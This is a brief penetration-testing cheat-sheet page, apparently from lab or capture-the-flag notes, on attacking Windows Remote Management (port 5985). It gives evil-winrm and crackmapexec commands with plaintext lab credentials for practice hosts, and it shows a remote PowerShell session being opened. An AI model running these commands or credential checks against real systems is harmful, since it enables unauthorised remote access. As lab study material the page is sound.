WinRM

HTTP remote interface tcp/5985

Evil WinRM

evil-winrm -i support.htb  -u support -p 'Ironside47pleasure40Watchful'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\support\Documents>

Install

git clone https://github.com/Hackplayers/evil-winrm

Run

ruby evil-winrm.rb -i 10.129.95.210 -u svc-alfresco -p s3rvice

Crackmapexec winrm

crackmapexec winrm 10.129.96.157 -u hazard -p stealth1agent

PreviousLDAP NextSMB & RPC Enumeration

Last updated 8 months ago